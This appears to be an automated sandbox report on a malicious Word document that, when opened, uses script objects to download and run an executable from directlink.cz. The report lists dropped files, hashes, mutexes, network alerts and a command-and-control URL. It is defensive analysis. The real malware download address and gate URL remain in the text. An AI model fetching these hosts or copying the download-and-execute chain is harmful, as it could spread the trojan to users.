"\Sessions\1\BaseNamedObjects\Local\10MU_ACBPIDS_S-1-5-5-0-61147"
"\Sessions\1\BaseNamedObjects\Global\552FFA80-3393-423d-8671-7BA046BB5906"
"\Sessions\1\BaseNamedObjects\Local\10MU_ACB10_S-1-5-5-0-61147"
"\Sessions\1\BaseNamedObjects\Local\ZonesCounterMutex"
"\Sessions\1\BaseNamedObjects\Local\ZoneAttributeCacheCounterMutex"
"\Sessions\1\BaseNamedObjects\Local\ZonesCacheCounterMutex"
"\Sessions\1\BaseNamedObjects\Local\ZonesLockedCacheCounterMutex"
"\Sessions\1\BaseNamedObjects\Global\MTX_MSO_Formal1_S-1-5-21-4162757579-3804539371-4239455898-1000"
"\Sessions\1\BaseNamedObjects\Global\MTX_MSO_AdHoc1_S-1-5-21-4162757579-3804539371-4239455898-1000"
"\Sessions\1\BaseNamedObjects\Local\c:!users!4z46j5z!appdata!local!microsoft!windows!temporary internet files!content.ie5!"
"\Sessions\1\BaseNamedObjects\Local\c:!users!4z46j5z!appdata!roaming!microsoft!windows!cookies!"
"\Sessions\1\BaseNamedObjects\Local\c:!users!4z46j5z!appdata!local!microsoft!windows!history!history.ie5!"
"\Sessions\1\BaseNamedObjects\Local\WininetStartupMutex"
"\Sessions\1\BaseNamedObjects\Local\WininetConnectionMutex"
"\Sessions\1\BaseNamedObjects\Local\WininetProxyRegistryMutex"
"\Sessions\1\BaseNamedObjects\Local\c:!users!4z46j5z!appdata!roaming!microsoft!windows!ietldcache!"
"\Sessions\1\BaseNamedObjects\RasPbFile"
"Local\WininetStartupMutex"
"IESQMMUTEX_0_208"
"Local\ZonesCounterMutex" - source
- Created Mutant
- relevance
- 3/10
-
Loads rich edit control libraries
- details
- "WINWORD.EXE" loaded module "%COMMONPROGRAMFILES%\microsoft shared\OFFICE14\RICHED20.DLL" at 68EE0000
- source
- Loaded Module
-
Logged script engine calls
- details
-
"WINWORD.EXE" called "Microsoft.XMLDOM.1.0.CreateObject" ...
"WINWORD.EXE" called "Microsoft.XMLDOM.1.0.createElement" with result: "IDispatch" ...
"WINWORD.EXE" called "Microsoft.XMLDOM.1.0("createElement").dataType" ...
"WINWORD.EXE" called "Microsoft.XMLDOM.1.0("createElement").text" ...
"WINWORD.EXE" called "Microsoft.XMLDOM.1.0("createElement").nodeTypedValue" with result: "WScript.Shell" ...
"WINWORD.EXE" called "WScript.Shell.1.CreateObject" ...
"WINWORD.EXE" called "Microsoft.XMLDOM.1.0("createElement").nodeTypedValue" with result: "GET" ...
"WINWORD.EXE" called "Microsoft.XMLDOM.1.0("createElement").nodeTypedValue" with result: "Microsoft.XMLHTTP" ... - source
- API Call
- relevance
- 10/10
-
Process launched with changed environment
- details
- Process "FXycd.exe" (Show Process) was launched with new environment variables: "WecVersionForRosebud.C00="4""
- source
- Monitored Target
- relevance
- 10/10
-
Runs shell commands
- details
- ""cmd /c ""%APPDATA%\Microsoft\FXycd.exe" """ on 2017-7-18.14:18:07.817
- source
- Monitored Target
- relevance
- 5/10
-
Scanning for window names
- details
-
"WINWORD.EXE" searching for class "MSOBALLOON"
"WINWORD.EXE" searching for class "MsoHelp10"
"WINWORD.EXE" searching for class "AgentAnim"
"WINWORD.EXE" searching for class "mspim_wnd32" - source
- API Call
- relevance
- 10/10
-
Spawns new processes
- details
-
Spawned process "FXycd.exe" (Show Process)
Spawned process "FXycd.exe" (Show Process)
Spawned process "cmd.exe" with commandline ""cmd /c ""%APPDATA%\Microsoft\FXycd.exe" """ (Show Process) - source
- Monitored Target
- relevance
- 3/10
-
Accesses System Certificates Settings
-
Installation/Persistance
-
Contains ability to lookup the windows account name
- details
- GetUserNameA@ADVAPI32.DLL from FXycd.exe (PID: 2580) (Show Stream)
- source
- Hybrid Analysis Technology
- relevance
- 5/10
-
Dropped files
- details
-
"6c961004be[1].exe" has type "PE32 executable (GUI) Intel 80386 for MS Windows"
"index.dat" has type "data"
"~WRD0000.tmp" has type "Composite Document File V2 Document Little Endian O%WINDIR%\Version 6.1 Code page: 1252 Author: CNC Template: Normal Last Saved By: CNC Revision Number: 1 Name of Creating Application: Microsoft Office Word Create Time/Date: Tue Jul 18 09:20:00 2017 Last Saved Time/Date: Tue Jul 18 09:20:00 2017 Number of Pages: 2 Number of Words: 0 Number of Characters: 2 Security: 0"
"~WRS{2FFE2C6F-7BB0-41BF-9A99-F06319AADF1E}.tmp" has type "data"
"FXycd.exe" has type "PE32 executable (GUI) Intel 80386 for MS Windows"
"3956644.bat" has type "ASCII text with CRLF CR line terminators"
"4z46j5z@directlink[1].txt" has type "ASCII text"
"ea106c66db968ce7d222d48f0da93b96095b423cb608b20b37dc536382e7bcef.doc.lnk" has type "MS Windows shortcut Item id list present Points to a file or directory Has Description string Has Relative path Has command line arguments Archive ctime=Tue Jul 18 20:15:49 2017 mtime=Tue Jul 18 20:15:49 2017 atime=Tue Jul 18 20:15:55 2017 length=657487 window=hide"
"~$106c66db968ce7d222d48f0da93b96095b423cb608b20b37dc536382e7bcef.doc" has type "data"
"~WRS{45601108-B7FC-4DB5-8B26-C9E0AF87C01F}.tmp" has type "data"
"ea106c66db968ce7d222d48f0da93b96095b423cb608b20b37dc536382e7bcef.LNK" has type "MS Windows shortcut Item id list present Points to a file or directory Has Relative path Archive ctime=Tue Jul 18 20:15:49 2017 mtime=Tue Jul 18 20:15:49 2017 atime=Tue Jul 18 20:15:55 2017 length=657487 window=hide"
"~WRS{AD652908-9C61-496B-9567-3F242C37817C}.tmp" has type "data"
"~$Normal.dotm" has type "data" - source
- Binary File
- relevance
- 3/10
-
Drops executable files
- details
-
"6c961004be[1].exe" has type "PE32 executable (GUI) Intel 80386 for MS Windows"
"FXycd.exe" has type "PE32 executable (GUI) Intel 80386 for MS Windows" - source
- Binary File
- relevance
- 10/10
-
Opens the MountPointManager (often used to detect additional infection locations)
- details
- "WINWORD.EXE" opened "MountPointManager"
- source
- API Call
- relevance
- 5/10
-
Touches files in the Windows directory
- details
-
"WINWORD.EXE" touched file "%WINDIR%\Globalization\Sorting\sortdefault.nls"
"WINWORD.EXE" touched file "%WINDIR%\Fonts\staticcache.dat"
"WINWORD.EXE" touched file "%WINDIR%\system32\en-US\USER32.dll.mui"
"WINWORD.EXE" touched file "%WINDIR%\Microsoft.NET\Framework\v1.0.3705\clr.dll"
"WINWORD.EXE" touched file "%WINDIR%\Microsoft.NET\Framework\v1.0.3705\mscorwks.dll"
"WINWORD.EXE" touched file "%WINDIR%\Microsoft.NET\Framework\v1.1.4322\clr.dll"
"WINWORD.EXE" touched file "%WINDIR%\Microsoft.NET\Framework\v1.1.4322\mscorwks.dll"
"WINWORD.EXE" touched file "%WINDIR%\Microsoft.NET\Framework\v2.0.50727\clr.dll"
"WINWORD.EXE" touched file "%WINDIR%\Microsoft.NET\Framework\v2.0.50727\mscorwks.dll"
"WINWORD.EXE" touched file "%WINDIR%\Microsoft.NET\Framework\v4.0.30319\clr.dll"
"WINWORD.EXE" touched file "%WINDIR%\system32\en-US\SETUPAPI.dll.mui"
"WINWORD.EXE" touched file "%LOCALAPPDATA%\Microsoft\Windows\Caches"
"WINWORD.EXE" touched file "%LOCALAPPDATA%\Microsoft\Windows\Caches\cversions.1.db"
"WINWORD.EXE" touched file "%LOCALAPPDATA%\Microsoft\Windows\Caches\{AFBF9F1A-8EE8-4C77-AF34-C647E37CA0D9}.1.ver0x000000000000000c.db"
"WINWORD.EXE" touched file "%WINDIR%\system32\rsaenh.dll"
"WINWORD.EXE" touched file "%WINDIR%\system32\en-US\KERNELBASE.dll.mui"
"WINWORD.EXE" touched file "%WINDIR%\System32\msxml6r.dll"
"WINWORD.EXE" touched file "%LOCALAPPDATA%\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{45601108-B7FC-4DB5-8B26-C9E0AF87C01F}.tmp"
"WINWORD.EXE" touched file "%WINDIR%\system32\en-US\MSCTF.dll.mui" - source
- API Call
- relevance
- 7/10
-
Contains ability to lookup the windows account name
-
Network Related
-
Found potential URL in binary/memory
- details
-
Pattern match: "http://schemas.openxmlformats.org/package/2006/relationships"
Pattern match: "http://schemas.openxmlformats.org/drawingml/2006/main"
Pattern match: "http://schemas.openxmlformats.org/drawingml/2006/picture"
Pattern match: "http://schemas.openxmlformats.org/schemaLibrary/2006/main"
Pattern match: "http://schemas.openxmlformats.org/officeDocument/2006/docPropsVTypes"
Pattern match: "http://schemas.openxmlformats.org/officeDocument/2006/relationships/extended-properties"
Pattern match: "http://schemas.openxmlformats.org/package/2006/relationships/metadata/core-properties"
Pattern match: "http://schemas.openxmlformats.org/officeDocument/2006/relationships/officeDocument"
Pattern match: "http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme"
Pattern match: "http://schemas.openxmlformats.org/officeDocument/2006/relationships/fontTable"
Pattern match: "http://schemas.openxmlformats.org/officeDocument/2006/relationships/styles"
Pattern match: "http://schemas.openxmlformats.org/officeDocument/2006/relationships/image"
Pattern match: "http://schemas.openxmlformats.org/officeDocument/2006/relationships/webSettings"
Pattern match: "http://schemas.openxmlformats.org/officeDocument/2006/relationships/settings"
Heuristic match: "vnd.ms"
Pattern match: "http://schemas.openxmlformats.org/markup-compatibility/2006"
Pattern match: "http://schemas.openxmlformats.org/officeDocument/2006/relationships"
Pattern match: "http://schemas.openxmlformats.org/officeDocument/2006/math"
Pattern match: "http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing"
Pattern match: "http://schemas.openxmlformats.org/wordprocessingml/2006/main"
Pattern match: "http://schemas.openxmlformats.org/officeDocument/2006/extended-properties"
Pattern match: "http://schemas.openxmlformats.org/package/2006/metadata/core-properties"
Pattern match: "http://purl.org/dc/elements/1.1/"
Pattern match: "http://purl.org/dc/terms/"
Pattern match: "http://purl.org/dc/dcmitype/"
Pattern match: "http://purl.org/dc/elements/1.1"
Pattern match: "http://purl.org/dc/terms"
Pattern match: "http://purl.org/dc/dcmitype"
Heuristic match: "directlink.cz"
Pattern match: "http://julybazed.pw/engine/gate.php"
Pattern match: "http://www.facebook.com/"
Heuristic match: "\RhinoSoft.com"
Pattern match: "http://www.ibsensoftware.com/"
Pattern match: "cM.qI/67o@}QX|"
Pattern match: "vak9i3ia.oU/paBqHrCwO"
Pattern match: "v.sRDp/C|%,lEAtPsa@L"
Pattern match: "k.IcF/=9@XAIZpq,$a"
Pattern match: "zmZH0.OCD/qO"
Pattern match: "s.mb/2g7m5,6\J},GKRU+Gd8$=q\&+YA%$M^2,p[FNv!Vm\0g!iXx?p}4`|,+B"
Heuristic match: "W4-.la"
Pattern match: "KId.Xo/fS,~"
Pattern match: "v.Zz/^t:,\`c" - source
- File/Memory
- relevance
- 10/10
-
Found potential URL in binary/memory
-
Spyware/Information Retrieval
-
Found a reference to a known community page
- details
-
"http://www.facebook.com/" (Indicator: "facebook.com")
"myspace1" (Indicator: "myspace") - source
- File/Memory
- relevance
- 7/10
-
Found a reference to a known community page
-
System Security
-
Hooks API calls
- details
-
"SysAllocStringByteLen@OLEAUT32.DLL" in "WINWORD.EXE"
"VariantChangeType@OLEAUT32.DLL" in "WINWORD.EXE"
"SysFreeString@OLEAUT32.DLL" in "WINWORD.EXE"
"OleLoadFromStream@OLE32.DLL" in "WINWORD.EXE"
"VariantClear@OLEAUT32.DLL" in "WINWORD.EXE" - source
- Hook Detection
- relevance
- 10/10
-
Hooks API calls
-
Unusual Characteristics
-
Reads information about supported languages
- details
-
"WINWORD.EXE" (Path: "HKLM\SYSTEM\CONTROLSET001\CONTROL\NLS\LOCALE"; Key: "00000401")
"WINWORD.EXE" (Path: "HKLM\SYSTEM\CONTROLSET001\CONTROL\NLS\LOCALE"; Key: "00000402")
"WINWORD.EXE" (Path: "HKLM\SYSTEM\CONTROLSET001\CONTROL\NLS\LOCALE"; Key: "00000403")
"WINWORD.EXE" (Path: "HKLM\SYSTEM\CONTROLSET001\CONTROL\NLS\LOCALE"; Key: "00000404")
"WINWORD.EXE" (Path: "HKLM\SYSTEM\CONTROLSET001\CONTROL\NLS\LOCALE"; Key: "00000405")
"WINWORD.EXE" (Path: "HKLM\SYSTEM\CONTROLSET001\CONTROL\NLS\LOCALE"; Key: "00000406")
"WINWORD.EXE" (Path: "HKLM\SYSTEM\CONTROLSET001\CONTROL\NLS\LOCALE"; Key: "00000407")
"WINWORD.EXE" (Path: "HKLM\SYSTEM\CONTROLSET001\CONTROL\NLS\LOCALE"; Key: "00000408")
"WINWORD.EXE" (Path: "HKLM\SYSTEM\CONTROLSET001\CONTROL\NLS\LOCALE"; Key: "00000409")
"WINWORD.EXE" (Path: "HKLM\SYSTEM\CONTROLSET001\CONTROL\NLS\LOCALE"; Key: "0000040A")
"WINWORD.EXE" (Path: "HKLM\SYSTEM\CONTROLSET001\CONTROL\NLS\LOCALE"; Key: "0000040B")
"WINWORD.EXE" (Path: "HKLM\SYSTEM\CONTROLSET001\CONTROL\NLS\LOCALE"; Key: "0000040C")
"WINWORD.EXE" (Path: "HKLM\SYSTEM\CONTROLSET001\CONTROL\NLS\LOCALE"; Key: "0000040D")
"WINWORD.EXE" (Path: "HKLM\SYSTEM\CONTROLSET001\CONTROL\NLS\LOCALE"; Key: "0000040E")
"WINWORD.EXE" (Path: "HKLM\SYSTEM\CONTROLSET001\CONTROL\NLS\LOCALE"; Key: "0000040F")
"WINWORD.EXE" (Path: "HKLM\SYSTEM\CONTROLSET001\CONTROL\NLS\LOCALE"; Key: "00000410")
"WINWORD.EXE" (Path: "HKLM\SYSTEM\CONTROLSET001\CONTROL\NLS\LOCALE"; Key: "00000411")
"WINWORD.EXE" (Path: "HKLM\SYSTEM\CONTROLSET001\CONTROL\NLS\LOCALE"; Key: "00000412")
"WINWORD.EXE" (Path: "HKLM\SYSTEM\CONTROLSET001\CONTROL\NLS\LOCALE"; Key: "00000413")
"WINWORD.EXE" (Path: "HKLM\SYSTEM\CONTROLSET001\CONTROL\NLS\LOCALE"; Key: "00000414") - source
- Registry Access
- relevance
- 3/10
-
Reads information about supported languages
File Details
IMG_065099102.DOC
- Filename
- IMG_065099102.DOC
- Size
- 642KiB (657487 bytes)
- Type
- docx office
- Description
- XML 1.0 document, UTF-8 Unicode text, with very long lines, with CRLF line terminators
- Architecture
- WINDOWS
- SHA256
- ea106c66db968ce7d222d48f0da93b96095b423cb608b20b37dc536382e7bcef
- MD5
- 5a0a4fed70d445310150f7cb3fb7e112
- SHA1
- 454a170387cb0ca4dd947ab83acc786f813bbba6
Screenshots
Loading content, please wait...
Hybrid Analysis
Tip: Click an analysed process below to view more details.
Analysed 4 processes in total (System Resource Monitor).
- WINWORD.EXE /n "C:\ea106c66db968ce7d222d48f0da93b96095b423cb608b20b37dc536382e7bcef.doc (PID: 3072)
Network Analysis
DNS Requests
Domain | Address | Registrar | Country |
---|---|---|---|
directlink.cz | 107.154.161.190 | - | United States |
Contacted Hosts
IP Address | Port/Protocol | Associated Process | Details |
---|---|---|---|
107.154.161.190 |
80
TCP |
winword.exe PID: 3072 |
United States |
Contacted Countries
HTTP Traffic
Endpoint | Request | URL | |
---|---|---|---|
107.154.161.190:80 (directlink.cz) | GET | directlink.cz/download/6c961004be.exe | GET /download/6c961004be.exe HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: directlink.cz
Connection: Keep-Alive 200 OK More Details |
Memory Forensics
String | Context | Stream UID |
---|---|---|
http://julybazed.pw/engine/gate.php | Domain/IP reference | 00020284-00002580-65389-9-0040FB37 |
http://www.facebook.com/ | Domain/IP reference | 00020284-00002580-65389-313-0040A63A |
rhinosoft.com | Domain/IP reference | 00020284-00002580-65389-280-00408D98 |
softx.org | Domain/IP reference | 00020284-00002580-65389-242-0040744A |
2.5.29.37 | Domain/IP reference | 00020284-00002580-65389-372-0040D183 |
Suricata Alerts
Event | Category | Description | SID |
---|---|---|---|
local -> 107.154.161.190:80 (TCP) | A Network Trojan was detected | ET CURRENT_EVENTS Possible Malicious Macro DL EXE Feb 2016 | 2022550 |
local -> 107.154.161.190:80 (TCP) | A Network Trojan was detected | ET CURRENT_EVENTS Possible Malicious Macro EXE DL AlphaNumL | 2022566 |
107.154.161.190 -> local:55954 (TCP) | Potential Corporate Privacy Violation | ET POLICY PE EXE or DLL Windows file download HTTP | 2018959 |
107.154.161.190 -> local:55954 (TCP) | Misc activity | ET INFO EXE - Served Attached HTTP | 2014520 |
Extracted Strings
Extracted Files
-
Malicious 1
-
-
3956644.bat
- Size
- 94B (94 bytes)
- Type
- text
- Description
- ASCII text, with CRLF, CR line terminators
- AV Scan Result
- Labeled as "Trojan.BAT" (31/80)
- Runtime Process
- cmd.exe (PID: 2340)
- MD5
- 3880eeb1c736d853eb13b44898b718ab
- SHA1
- 4eec9d50360cd815211e3c4e6bdd08271b6ec8e6
- SHA256
- 936d9411d5226b7c5a150ecaf422987590a8870c8e095e1caa072273041a86e7
-
-
Informative Selection 1
-
-
FXycd.exe
- Size
- 1012KiB (1035776 bytes)
- Type
- peexe executable
- Description
- PE32 executable (GUI) Intel 80386, for MS Windows
- Runtime Process
- WINWORD.EXE (PID: 3072)
- MD5
- 2d1280909fa3411b113b739ac935b8fc
- SHA1
- a70fb6a3ce12be9dd7907720a74509dbe3b814a6
- SHA256
- de33a8f9b5599dd1c17d2c3487aafe545ee4f9ed6d18ff15f9ff4e3f8ee5c0e4
-
-
Informative 11
-
-
ea106c66db968ce7d222d48f0da93b96095b423cb608b20b37dc536382e7bcef.LNK
- Size
- 733B (733 bytes)
- Type
- lnk
- Description
- MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Tue Jul 18 20:15:49 2017, mtime=Tue Jul 18 20:15:49 2017, atime=Tue Jul 18 20:15:55 2017, length=657487, window=hide
- Runtime Process
- WINWORD.EXE (PID: 3072)
- MD5
- d3fa86ce2962863c289b842842658314
- SHA1
- 09b26adbc89c9abd5ea08eb2e9d7eba9712b78fb
- SHA256
- 016c5a645727e330704e5d69c4e66caec586470bb48ac199475c8ed01c126ef3
-
index.dat
- Size
- 257B (257 bytes)
- Type
- data
- Runtime Process
- WINWORD.EXE (PID: 3072)
- MD5
- 8e8d460bde666ee844e1b680b633bffc
- SHA1
- c70fad686f9a45a66c70845657dd28c2d1050dfc
- SHA256
- 1f5303c866f3911e2c20b50b8ca6e1e214736b359931a5bf6cd9235a8fa48808
-
~$Normal.dotm
- Size
- 162B (162 bytes)
- Type
- data
- Runtime Process
- WINWORD.EXE (PID: 3072)
- MD5
- 5ff6040dd6da452bc183ee5abcdf9ee8
- SHA1
- 83b3f33ad2c8b543ee739f94a8e28be509a07911
- SHA256
- c1539d568c82522a6fdff2acf511cb89f496092c8ccc0b395703a45f345cf027
-
4z46j5z@directlink[1].txt
- Size
- 146B (146 bytes)
- Type
- text
- Description
- ASCII text
- Runtime Process
- WINWORD.EXE (PID: 3072)
- MD5
- 2f882c0104a6c013b89a6e638423e6a6
- SHA1
- 11dbec780967708bb2d8caf347e28aa5c6f9ca8c
- SHA256
- a062a3be4e58ee39a30ca26031ceadb2c3280d23d748c6a44b436b051074ad03
-
6c961004be[1].exe
- Size
- 1012KiB (1035776 bytes)
- Type
- peexe executable
- Description
- PE32 executable (GUI) Intel 80386, for MS Windows
- Runtime Process
- WINWORD.EXE (PID: 3072)
- MD5
- 2d1280909fa3411b113b739ac935b8fc
- SHA1
- a70fb6a3ce12be9dd7907720a74509dbe3b814a6
- SHA256
- de33a8f9b5599dd1c17d2c3487aafe545ee4f9ed6d18ff15f9ff4e3f8ee5c0e4
-
~WRS{45601108-B7FC-4DB5-8B26-C9E0AF87C01F}.tmp
- Size
- 1KiB (1024 bytes)
- Type
- data
- Runtime Process
- WINWORD.EXE (PID: 3072)
- MD5
- 5d4d94ee7e06bbb0af9584119797b23a
- SHA1
- dbb111419c704f116efa8e72471dd83e86e49677
- SHA256
- 4826c0d860af884d3343ca6460b0006a7a2ce7dbccc4d743208585d997cc5fd1
-
~WRS{AD652908-9C61-496B-9567-3F242C37817C}.tmp
- Size
- 1.5KiB (1536 bytes)
- Type
- data
- Runtime Process
- WINWORD.EXE (PID: 3072)
- MD5
- 65352dc19fd8213ef55e71778b5deed2
- SHA1
- 42a7bba4eec8a7fbf977ee32e20bc6cba625ef28
- SHA256
- 83c701bdbf76b95b746615793d6436d042a910f90de1e6c2d0736ca5be497009
-
~$106c66db968ce7d222d48f0da93b96095b423cb608b20b37dc536382e7bcef.doc
- Size
- 162B (162 bytes)
- Type
- data
- Runtime Process
- WINWORD.EXE (PID: 3072)
- MD5
- 5ff6040dd6da452bc183ee5abcdf9ee8
- SHA1
- 83b3f33ad2c8b543ee739f94a8e28be509a07911
- SHA256
- c1539d568c82522a6fdff2acf511cb89f496092c8ccc0b395703a45f345cf027
-
~WRD0000.tmp
- Size
- 424KiB (434176 bytes)
- Type
- doc office
- Description
- Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Author: CNC, Template: Normal, Last Saved By: CNC, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Tue Jul 18 09:20:00 2017, Last Saved Time/Date: Tue Jul 18 09:20:00 2017, Number of Pages: 2, Number of Words: 0, Number of Characters: 2, Security: 0
- MD5
- e6e2f08267e3a699683f6983f22754df
- SHA1
- 0b90eede5b6db54ac814187221b4bc2201a1f7d4
- SHA256
- 01b3336a2d89925d8d9d020cb8a63469495b8d4f08f8aa58a49c172fc159da13
-
~WRS{2FFE2C6F-7BB0-41BF-9A99-F06319AADF1E}.tmp
- Size
- 1.5KiB (1536 bytes)
- Type
- data
- MD5
- 4dccc2000c7cd28966cf0a58334e7870
- SHA1
- caf924828260f7f31f929acd8ba201540cf82de7
- SHA256
- abe3c57c22c2ead595d9c417550408f1c017ad79f49e6e6297938e7bdcdaca45
-
ea106c66db968ce7d222d48f0da93b96095b423cb608b20b37dc536382e7bcef.doc.lnk
- Size
- 809B (809 bytes)
- Type
- lnk
- Description
- MS Windows shortcut, Item id list present, Points to a file or directory, Has Description string, Has Relative path, Has command line arguments, Archive, ctime=Tue Jul 18 20:15:49 2017, mtime=Tue Jul 18 20:15:49 2017, atime=Tue Jul 18 20:15:55 2017, length=657487, window=hide
- MD5
- 9e7607cdbb700917b7c6be97691b6670
- SHA1
- 6d05118016304f443caf6d5834617c44a9608cee
- SHA256
- 4be95896f0126b33c2e7b7b07f667054ae0cf1f117b8c3595fa2114b66740126
-
Notifications
-
Runtime
- Added comment to Virus Total report
- Extracted file "6c961004be[1].exe" was unknown to VirusTotal, submitted file for scanning (Permalink: "https://www.virustotal.com/file/de33a8f9b5599dd1c17d2c3487aafe545ee4f9ed6d18ff15f9ff4e3f8ee5c0e4/analysis/1500384372/")
- Extracted file "~$106c66db968ce7d222d48f0da93b96095b423cb608b20b37dc536382e7bcef.doc" was unknown to VirusTotal, submitted file for scanning (Permalink: "https://www.virustotal.com/file/c1539d568c82522a6fdff2acf511cb89f496092c8ccc0b395703a45f345cf027/analysis/1500384375/")
- Extracted file "~WRD0000.tmp" was unknown to VirusTotal, submitted file for scanning (Permalink: "https://www.virustotal.com/file/01b3336a2d89925d8d9d020cb8a63469495b8d4f08f8aa58a49c172fc159da13/analysis/1500384374/")
- Not all file accesses are visible for cmd.exe (PID: 2340)
- Not all sources for signature ID "api-55" are available in the report
- Not all sources for signature ID "api-64" are available in the report
- Not all sources for signature ID "mutant-0" are available in the report
- Not all sources for signature ID "registry-25" are available in the report
- Not all sources for signature ID "registry-55" are available in the report
- Not all sources for signature ID "string-18" are available in the report
- Not all sources for signature ID "string-50" are available in the report
- Not all strings are visible in the report, because the maximum number of strings was reached (5000)
- Some low-level data is hidden, as this is only a slim report